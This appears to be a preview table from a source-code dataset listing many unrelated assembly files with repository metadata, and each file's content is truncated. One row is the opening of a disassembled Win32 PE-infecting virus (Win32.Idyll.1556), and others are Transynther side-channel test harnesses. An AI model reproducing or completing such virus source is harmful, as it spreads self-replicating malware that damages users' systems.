hexsha stringlengths 40 40 | size int64 6 1.05M | ext stringclasses 3
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 232 | max_stars_repo_name stringlengths 7 106 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 7 | max_stars_count int64 1 33.5k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 232 | max_issues_repo_name stringlengths 7 106 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 7 | max_issues_count int64 1 37.5k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 232 | max_forks_repo_name stringlengths 7 106 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 7 | max_forks_count int64 1 12.6k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 6 1.05M | avg_line_length float64 1.16 19.7k | max_line_length int64 2 938k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
922466f5fd72b798ed275f64aab5869be91164b9 | 7,991 | asm | Assembly | Transynther/x86/_processed/AVXALIGN/_zr_/i7-7700_9_0xca_notsx.log_21829_1466.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/AVXALIGN/_zr_/i7-7700_9_0xca_notsx.log_21829_1466.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/AVXALIGN/_zr_/i7-7700_9_0xca_notsx.log_21829_1466.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r13
push %rbp
push %rbx
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WT_ht+0x1cbc1, %r13
nop
nop
nop
sub %rdx, %rdx
mov $0x6162636465666768, %rbx
movq %rbx, %xmm2
vmovups %ymm2, (%r13)
add %r11, %r11
lea addresses_A_ht+0x60c1, %rdx
nop
nop
nop
and %r... | 34.149573 | 2,999 | 0.660368 |
d84033ddf31f5eb4a60e0c25a40433f8066a4ac5 | 3,980 | asm | Assembly | 1581/64tass/romtbl.asm | silverdr/assembly | c2851f7033223e089285dce22443b7e219ed4f61 | [
"Unlicense"
] | 23 | 2015-03-23T15:16:57.000Z | 2022-03-18T12:43:42.000Z | 1581/64tass/romtbl.asm | silverdr/assembly | c2851f7033223e089285dce22443b7e219ed4f61 | [
"Unlicense"
] | null | null | null | 1581/64tass/romtbl.asm | silverdr/assembly | c2851f7033223e089285dce22443b7e219ed4f61 | [
"Unlicense"
] | 8 | 2016-04-13T11:19:35.000Z | 2021-12-22T07:39:00.000Z | ; command tables and information
cmdtbb .word fstrd ; fast read drv #0 - 0000
.word ndkrd ; fast read drv #1 - 0001
.word fstwrt ; fast write drv #0 - 0010
.word ndkwrt ; fast write drv #1 - 0011... | 47.951807 | 71 | 0.451759 |
f03abfa359aaf6c4edbf81601a00882ae1b73c73 | 287 | asm | Assembly | programs/oeis/035/A035013.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/035/A035013.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/035/A035013.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A035013: One third of 9-factorial numbers.
; 1,12,252,7560,294840,14152320,806682240,53241027840,3993077088000,335418475392000,31193918211456000,3181779657568512000,353177541990104832000,42381305038812579840000
mov $1,1
mov $2,3
lpb $0
sub $0,1
add $2,9
mul $1,$2
lpe
mov $0,$1
| 23.916667 | 167 | 0.777003 |
c32c081435c85d90b71c7b2dba0b5f36ddea416c | 112 | asm | Assembly | libsrc/_DEVELOPMENT/math/float/math48/lm/c/sdcc_ix/cosh.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 640 | 2017-01-14T23:33:45.000Z | 2022-03-30T11:28:42.000Z | libsrc/_DEVELOPMENT/math/float/math48/lm/c/sdcc_ix/cosh.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 1,600 | 2017-01-15T16:12:02.000Z | 2022-03-31T12:11:12.000Z | libsrc/_DEVELOPMENT/math/float/math48/lm/c/sdcc_ix/cosh.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 215 | 2017-01-17T10:43:03.000Z | 2022-03-23T17:25:02.000Z |
SECTION code_clib
SECTION code_fp_math48
PUBLIC _cosh
EXTERN cm48_sdccix_cosh
defc _cosh = cm48_sdccix_cosh
| 11.2 | 29 | 0.848214 |
5f58b8b4a3cc0f60b05a10f03d8534ff063d7cc0 | 18,462 | asm | Assembly | Win32/Win32.Idyll/Win32.Idyll.1556.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | 3 | 2021-05-15T15:57:13.000Z | 2022-03-16T09:11:05.000Z | Win32/Win32.Idyll/Win32.Idyll.1556.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | null | null | null | Win32/Win32.Idyll/Win32.Idyll.1556.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | 3 | 2021-05-15T15:57:15.000Z | 2022-01-08T20:51:04.000Z | ;
; Win32.Idyll.1556
; disassembly done by peon
;
;
;
; This is a noninteresting,nonresident infector of PE files.
; Infects files in the current directory.No payload or anything interesting.
; Assumed to be compiled with /m switch so NOP's after jumps included in the source.
;
; Sorry for the annoying lack of com... | 26.756522 | 84 | 0.733507 |
6b8759b3d48336d01cabdef5fa226f743b8f3f41 | 4,650 | asm | Assembly | Transynther/x86/_processed/AVXALIGN/_st_/i9-9900K_12_0xa0.log_21829_1030.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/AVXALIGN/_st_/i9-9900K_12_0xa0.log_21829_1030.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/AVXALIGN/_st_/i9-9900K_12_0xa0.log_21829_1030.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %rbx
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_D_ht+0x1b0cd, %rsi
lea addresses_A_ht+0x1d549, %rdi
nop
nop
nop
nop
nop
sub %rbx, %rbx
mov $15, %rcx
rep movsl
nop
nop
nop
sub %r12, %r12
lea addresses_WC_ht+0x10735, %rdx
nop
nop
nop
nop
inc %rbx
mov ... | 46.5 | 2,999 | 0.661935 |
2c126d99e258a5250cd50845de367279e701f7ca | 881 | asm | Assembly | libsrc/strings/strstr_callee.asm | andydansby/z88dk-mk2 | 51c15f1387293809c496f5eaf7b196f8a0e9b66b | [
"ClArtistic"
] | 1 | 2020-09-15T08:35:49.000Z | 2020-09-15T08:35:49.000Z | libsrc/strings/strstr_callee.asm | dex4er/deb-z88dk | 9ee4f23444fa6f6043462332a1bff7ae20a8504b | [
"ClArtistic"
] | null | null | null | libsrc/strings/strstr_callee.asm | dex4er/deb-z88dk | 9ee4f23444fa6f6043462332a1bff7ae20a8504b | [
"ClArtistic"
] | null | null | null | ; char __CALLEE__ *strstr_callee(char *s, char *w)
; return ptr to first occurrence of string w in s
; 01.2007 aralbrec
XLIB strstr_callee
XDEF ASMDISP_STRSTR_CALLEE
.strstr_callee
pop af
pop hl
pop de
push af
; enter : de = char *s
; hl = char *w
; exit : found : hl = ptr, NC flag ... | 12.585714 | 53 | 0.530079 |
5dc67a363bc913000bec5629111f5ae4bf41f107 | 5,923 | asm | Assembly | Transynther/x86/_processed/NONE/_ht_st_zr_un_/i3-7100_9_0xca_notsx.log_36_1618.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_ht_st_zr_un_/i3-7100_9_0xca_notsx.log_36_1618.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_ht_st_zr_un_/i3-7100_9_0xca_notsx.log_36_1618.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r13
push %r15
push %rax
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_normal_ht+0x18ca8, %rsi
lea addresses_WT_ht+0xebd8, %rdi
nop
nop
nop
nop
nop
xor $23534, %r11
mov $79, %rcx
rep movsl
nop
nop
nop
nop
xor $24580, %r13
lea addresses_D_ht+0xc59c, %rb... | 22.520913 | 288 | 0.637346 |
6734b331113aa041c384eb96e4a8247dcbee8741 | 8,928 | asm | Assembly | target/cos_117/disasm/iop_overlay1/STOP.asm | jrrk2/cray-sim | 52c9639808d6890517092637b188282c00cce4f7 | [
"BSL-1.0"
] | 49 | 2020-10-09T12:29:16.000Z | 2022-03-12T02:33:35.000Z | target/cos_117/disasm/iop_overlay1/STOP.asm | jrrk2/cray-sim | 52c9639808d6890517092637b188282c00cce4f7 | [
"BSL-1.0"
] | 1 | 2021-12-29T15:59:25.000Z | 2021-12-29T15:59:25.000Z | target/cos_117/disasm/iop_overlay1/STOP.asm | jrrk2/cray-sim | 52c9639808d6890517092637b188282c00cce4f7 | [
"BSL-1.0"
] | 6 | 2021-04-12T06:10:32.000Z | 2022-02-08T23:11:19.000Z | 0x0000 (0x000000) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0001 (0x000002) 0x291B- f:00024 d: 283 | OR[283] = A
0x0002 (0x000004) 0x1800-0x004C f:00014 d: 0 | A = 76 (0x004C)
0x0004 (0x000008) 0x2403- f:00022 d: 3 | A = A + OR[3]
... | 89.28 | 127 | 0.464494 |
dbccce4757a016afc7d640ca4d3ea7194c81cdc0 | 395 | asm | Assembly | libsrc/stdio/tms9918/bordercolour.asm | Toysoft/z88dk | f930bef9ac4feeec91a07303b79ddd9071131a24 | [
"ClArtistic"
] | null | null | null | libsrc/stdio/tms9918/bordercolour.asm | Toysoft/z88dk | f930bef9ac4feeec91a07303b79ddd9071131a24 | [
"ClArtistic"
] | null | null | null | libsrc/stdio/tms9918/bordercolour.asm | Toysoft/z88dk | f930bef9ac4feeec91a07303b79ddd9071131a24 | [
"ClArtistic"
] | 1 | 2019-12-03T23:28:20.000Z | 2019-12-03T23:28:20.000Z | ; void bordercolor(int c) __z88dk_fastcall;
;
;
SECTION code_clib
IF FORspc1000
PUBLIC __tms9918_bordercolor
ELSE
PUBLIC bordercolor
PUBLIC _bordercolor
defc bordercolor = __tms9918_bordercolor
defc _bordercolor = __tms9918_bordercolor
ENDIF
EXTERN conio_map_colour
EXTERN msx_set_border
__tms9... | 16.458333 | 43 | 0.794937 |
d4f1d8585d13004426c4814f49d903d7e9a24e5c | 7,565 | asm | Assembly | Library/Spreadsheet/Spreadsheet/spreadsheetCutCopyUtils.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 504 | 2018-11-18T03:35:53.000Z | 2022-03-29T01:02:51.000Z | Library/Spreadsheet/Spreadsheet/spreadsheetCutCopyUtils.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 96 | 2018-11-19T21:06:50.000Z | 2022-03-06T10:26:48.000Z | Library/Spreadsheet/Spreadsheet/spreadsheetCutCopyUtils.asm | steakknife/pcgeos | 95edd7fad36df400aba9bab1d56e154fc126044a | [
"Apache-2.0"
] | 73 | 2018-11-19T20:46:53.000Z | 2022-03-29T00:59:26.000Z | COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) Geoworks 1991 -- All Rights Reserved
PROJECT: PC GEOS
MODULE:
FILE:
AUTHOR: Cheng, 6/91
ROUTINES:
Name Description
---- -----------
REVISION HISTORY:
Name Date Description
---- ---- -----... | 21.738506 | 81 | 0.535096 |
8314084abbb4698c3da62d8e5aee18cff84d9bb4 | 321 | asm | Assembly | programs/oeis/317/A317657.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/317/A317657.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/317/A317657.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A317657: Numbers congruent to {15, 75, 95} mod 100.
; 15,75,95,115,175,195,215,275,295,315,375,395,415,475,495,515,575,595,615,675,695,715,775,795,815,875,895,915,975,995,1015,1075,1095,1115,1175,1195,1215,1275,1295,1315,1375,1395,1415,1475,1495,1515
mov $1,$0
add $1,2
div $1,3
mul $1,2
add $1,$0
mul $1,20
add $1,15... | 29.181818 | 198 | 0.700935 |
4315e69bdbb771e3eae7af3abe1eef24a8f0ee05 | 13,491 | asm | Assembly | src/dos32a/text/client/data.asm | amindlost/dos32a | 06d8e3a0b2397d872205d6c99a7de0d6b8628bcc | [
"Unlicense"
] | 5 | 2022-01-21T08:09:42.000Z | 2022-03-17T10:15:55.000Z | src/dos32a/text/client/data.asm | amindlost/dos32a | 06d8e3a0b2397d872205d6c99a7de0d6b8628bcc | [
"Unlicense"
] | null | null | null | src/dos32a/text/client/data.asm | amindlost/dos32a | 06d8e3a0b2397d872205d6c99a7de0d6b8628bcc | [
"Unlicense"
] | 1 | 2022-02-19T22:58:50.000Z | 2022-02-19T22:58:50.000Z | ;
; Copyright (C) 1996-2006 by Narech K. All rights reserved.
;
; Redistribution and use in source and binary forms, with or without
; modification, are permitted provided that the following conditions are
; met:
;
; 1. Redistributions of source code must retain the above copyright
; notice, this list of co... | 33.896985 | 79 | 0.641835 |
d2e64e52b56c222b9c3a4729876cf17bd12de97b | 1,061 | asm | Assembly | _build/dispatcher/jmp_ippsHashInit_rmf_92550b38.asm | zyktrcn/ippcp | b0bbe9bbb750a7cf4af5914dd8e6776a8d544466 | [
"Apache-2.0"
] | 1 | 2021-10-04T10:21:54.000Z | 2021-10-04T10:21:54.000Z | _build/dispatcher/jmp_ippsHashInit_rmf_92550b38.asm | zyktrcn/ippcp | b0bbe9bbb750a7cf4af5914dd8e6776a8d544466 | [
"Apache-2.0"
] | null | null | null | _build/dispatcher/jmp_ippsHashInit_rmf_92550b38.asm | zyktrcn/ippcp | b0bbe9bbb750a7cf4af5914dd8e6776a8d544466 | [
"Apache-2.0"
] | null | null | null | extern m7_ippsHashInit_rmf:function
extern n8_ippsHashInit_rmf:function
extern y8_ippsHashInit_rmf:function
extern e9_ippsHashInit_rmf:function
extern l9_ippsHashInit_rmf:function
extern n0_ippsHashInit_rmf:function
extern k0_ippsHashInit_rmf:function
extern ippcpJumpIndexForMergedLibs
extern ippcpSafeInit:function
s... | 27.205128 | 91 | 0.792648 |
524d3f7e4caa7ee9ccd8222b3499d40c0a08c724 | 548 | asm | Assembly | test/alu.asm | sinofp/napalm | d06abf10d5dd8ec0ad35560a45b73c01323a9451 | [
"MIT"
] | 4 | 2020-10-10T06:47:44.000Z | 2021-11-16T14:35:39.000Z | test/alu.asm | sinofp/napalm | d06abf10d5dd8ec0ad35560a45b73c01323a9451 | [
"MIT"
] | null | null | null | test/alu.asm | sinofp/napalm | d06abf10d5dd8ec0ad35560a45b73c01323a9451 | [
"MIT"
] | 1 | 2021-03-08T11:49:07.000Z | 2021-03-08T11:49:07.000Z | addiu $t0, $0, 1
addiu $t1, $0, 2
addiu $t2, $0, 1
addiu $t3, $0, 2
addiu $t4, $0, 123
addiu $t5, $0, 456
addiu $t6, $0, 789
addiu $t7, $0, 1111
addiu $t8, $0, 2222
addiu $t9, $0, 3333
sllv $t0, $t0, $t1
sub $t1, $t1, 1
addu $t2, $t2, $t3
and $t4, $t4, $t5
or $t6, $t6, $t7
sll $t8, $t8, 1
srlv $t0, $t0, $t1
slt $t2, $t... | 17.677419 | 19 | 0.543796 |
4bab82a377d6c131dddf555379289b3097e1353f | 1,021 | asm | Assembly | programs/oeis/080/A080036.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/080/A080036.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/080/A080036.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A080036: a(n) = n + round(sqrt(2*n)) + 1.
; 1,3,5,6,8,9,10,12,13,14,15,17,18,19,20,21,23,24,25,26,27,28,30,31,32,33,34,35,36,38,39,40,41,42,43,44,45,47,48,49,50,51,52,53,54,55,57,58,59,60,61,62,63,64,65,66,68,69,70,71,72,73,74,75,76,77,78,80,81,82,83,84,85,86,87,88,89,90,91,93,94,95,96,97,98,99,100,101,102,103,104,10... | 92.818182 | 909 | 0.698335 |
6ad7751963b89ce552f8749bf52c37f11924978c | 270 | asm | Assembly | _anim/obj08.asm | vladjester2020/Sonic1TMR | 22e749a2aab74cc725729e476d6252b071c12e42 | [
"Apache-2.0"
] | null | null | null | _anim/obj08.asm | vladjester2020/Sonic1TMR | 22e749a2aab74cc725729e476d6252b071c12e42 | [
"Apache-2.0"
] | 2 | 2019-06-13T14:26:59.000Z | 2019-10-10T13:15:14.000Z | _anim/obj08.asm | vladjester2020/Sonic1TMR | 22e749a2aab74cc725729e476d6252b071c12e42 | [
"Apache-2.0"
] | null | null | null | ; ---------------------------------------------------------------------------
; Animation script - water splash (LZ)
; ---------------------------------------------------------------------------
dc.w byte_145C6-Ani_obj08
byte_145C6: dc.b 4, 0, 1, 2, $FC, 0
even | 45 | 78 | 0.274074 |
0873792f9dcd567bd92fb69a5937de70fe6f1aeb | 5,659 | asm | Assembly | Transynther/x86/_processed/NC/_ht_zr_/i9-9900K_12_0xca_notsx.log_2019_945.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NC/_ht_zr_/i9-9900K_12_0xca_notsx.log_2019_945.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NC/_ht_zr_/i9-9900K_12_0xca_notsx.log_2019_945.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r13
push %r8
push %r9
push %rax
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_UC_ht+0x1a9a4, %r8
add $60869, %rax
mov $0x6162636465666768, %rdx
movq %rdx, %xmm0
movups %xmm0, (%r8)
nop
nop
add %r13, %r13
lea addresses_A_ht+0x84a4, %rsi
lea addresses_WT_ht+0x566... | 39.027586 | 2,999 | 0.659304 |
e5af5fc2929423a3a05082acb96b89183b439ff8 | 7,827 | asm | Assembly | Transynther/x86/_processed/AVXALIGN/_st_zr_sm_/i7-7700_9_0xca_notsx.log_21829_1843.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/AVXALIGN/_st_zr_sm_/i7-7700_9_0xca_notsx.log_21829_1843.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/AVXALIGN/_st_zr_sm_/i7-7700_9_0xca_notsx.log_21829_1843.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r14
push %rax
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_A_ht+0x1c820, %r12
nop
nop
nop
nop
xor $30543, %rax
mov (%r12), %r14d
and %r14, %r14
lea addresses_normal_ht+0x5d2c, %rdx
nop
nop
nop
nop
and %rbp, %rbp
mov (%rdx), %r12d
nop
and $4... | 36.069124 | 2,999 | 0.657084 |
ac7615fb2b62d7c65afeb850310cc304dbf4238f | 6,404 | asm | Assembly | Transynther/x86/_processed/AVXALIGN/_ht_zr_un_/i3-7100_9_0x84_notsx.log_21829_2518.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/AVXALIGN/_ht_zr_un_/i3-7100_9_0x84_notsx.log_21829_2518.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/AVXALIGN/_ht_zr_un_/i3-7100_9_0x84_notsx.log_21829_2518.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r8
push %r9
push %rax
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_WT_ht+0x1d47, %rsi
lea addresses_UC_ht+0x1c219, %rdi
nop
nop
inc %r9
mov $127, %rcx
rep movsq
nop
nop
nop
xor %rdi, %rdi
lea addresses_A_ht+0x17947, %rsi
lea addresses_WT_ht+0x17d47, ... | 37.893491 | 2,999 | 0.657558 |
17c6ffbadb8c6723d830cb02c905ccd0f40e3ab2 | 1,448 | asm | Assembly | C/LoDosLib/getvxdep.asm | p-k-p/SysToolsLib | 827be2799e541410cb5c11358cd4ce6859e171ad | [
"Apache-2.0"
] | 232 | 2016-04-27T21:56:11.000Z | 2022-03-29T09:02:15.000Z | C/LoDosLib/getvxdep.asm | p-k-p/SysToolsLib | 827be2799e541410cb5c11358cd4ce6859e171ad | [
"Apache-2.0"
] | 31 | 2016-05-09T09:05:36.000Z | 2022-03-29T19:17:45.000Z | C/LoDosLib/getvxdep.asm | p-k-p/SysToolsLib | 827be2799e541410cb5c11358cd4ce6859e171ad | [
"Apache-2.0"
] | 94 | 2016-06-01T18:10:39.000Z | 2022-03-26T10:44:57.000Z | page , 132
;*****************************************************************************;
; ;
; FileName: GetVxdEP.asm ;
; ;
; Contents: Get a VxD V86 entry point ;
; ;
; Notes: ;
; ;
; History: ;
; 1995/11/10 JFL Crea... | 26.327273 | 79 | 0.381906 |
0cc26b9d3a4a84daa028dd3ad933a97c20de43c7 | 185 | asm | Assembly | recipes/libelfin/all/test_package/hello.asm | rockandsalt/conan-center-index | d739adcec3e4dd4c250eff559ceb738e420673dd | [
"MIT"
] | 562 | 2019-09-04T12:23:43.000Z | 2022-03-29T16:41:43.000Z | recipes/libelfin/all/test_package/hello.asm | rockandsalt/conan-center-index | d739adcec3e4dd4c250eff559ceb738e420673dd | [
"MIT"
] | 9,799 | 2019-09-04T12:02:11.000Z | 2022-03-31T23:55:45.000Z | recipes/libelfin/all/test_package/hello.asm | rockandsalt/conan-center-index | d739adcec3e4dd4c250eff559ceb738e420673dd | [
"MIT"
] | 1,126 | 2019-09-04T11:57:46.000Z | 2022-03-31T16:43:38.000Z | SECTION .data
msg: db "Hi World",10
len: equ $-msg
SECTION .text
global main
main:
mov edx,len
mov ecx,msg
mov ebx,1
mov eax,4
int 0x80
mov ebx,0
mov eax,1
int 0x80
| 10.882353 | 21 | 0.643243 |
6f5c992b419328ca74a5e4eb4b360c26899d8b30 | 1,448 | asm | Assembly | AVR/queue.asm | StxGuy/EmbeddedSystems | 6d9bc8b295724d361ea1d82e701e6530f74e2300 | [
"MIT"
] | null | null | null | AVR/queue.asm | StxGuy/EmbeddedSystems | 6d9bc8b295724d361ea1d82e701e6530f74e2300 | [
"MIT"
] | null | null | null | AVR/queue.asm | StxGuy/EmbeddedSystems | 6d9bc8b295724d361ea1d82e701e6530f74e2300 | [
"MIT"
] | null | null | null | ;-------------------------------------;
; FIFO FOR ATMEL328 ;
; ;
; Por: Prof. Carlo Requiao ;
; 22/Sep/2020 ;
;-------------------------------------;
.device ATmega328
;-------------------------------------;
; MEMORY SE... | 17.876543 | 39 | 0.372238 |
261b8a3cca367cb61fba2b52e7c10e31f6d98774 | 504 | asm | Assembly | oeis/029/A029635.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/029/A029635.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/029/A029635.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A029635: The (1,2)-Pascal triangle (or Lucas triangle) read by rows.
; Submitted by Christian Krause
; 2,1,2,1,3,2,1,4,5,2,1,5,9,7,2,1,6,14,16,9,2,1,7,20,30,25,11,2,1,8,27,50,55,36,13,2,1,9,35,77,105,91,49,15,2,1,10,44,112,182,196,140,64,17,2,1,11,54,156,294,378,336,204,81,19,2,1,12,65,210,450,672,714,540,285,100,21,... | 33.6 | 302 | 0.644841 |
a535281fe2960d8b330e3f87e0b609f460d4be8a | 742 | asm | Assembly | oeis/041/A041623.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/041/A041623.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/041/A041623.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A041623: Denominators of continued fraction convergents to sqrt(330).
; Submitted by Jamie Morken(s1.)
; 1,6,217,1308,47305,285138,10312273,62158776,2248028209,13550328030,490059837289,2953909351764,106830796500793,643938688356522,23288623577335585,140375680152370032,5076813109062656737,30601254334528310454,110672196... | 37.1 | 482 | 0.820755 |
c2f06afd46a19c686cb04925f31446c96f5d04b5 | 362 | asm | Assembly | oeis/218/A218930.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/218/A218930.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/218/A218930.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A218930: Number of maximal supersolvable conjugacy classes of subgroups of the symmetric group.
; 1,1,1,1,2,3,4,5,6,8,11,14,19,23
mov $2,1
mov $3,$0
mul $3,5
lpb $3
mul $1,$0
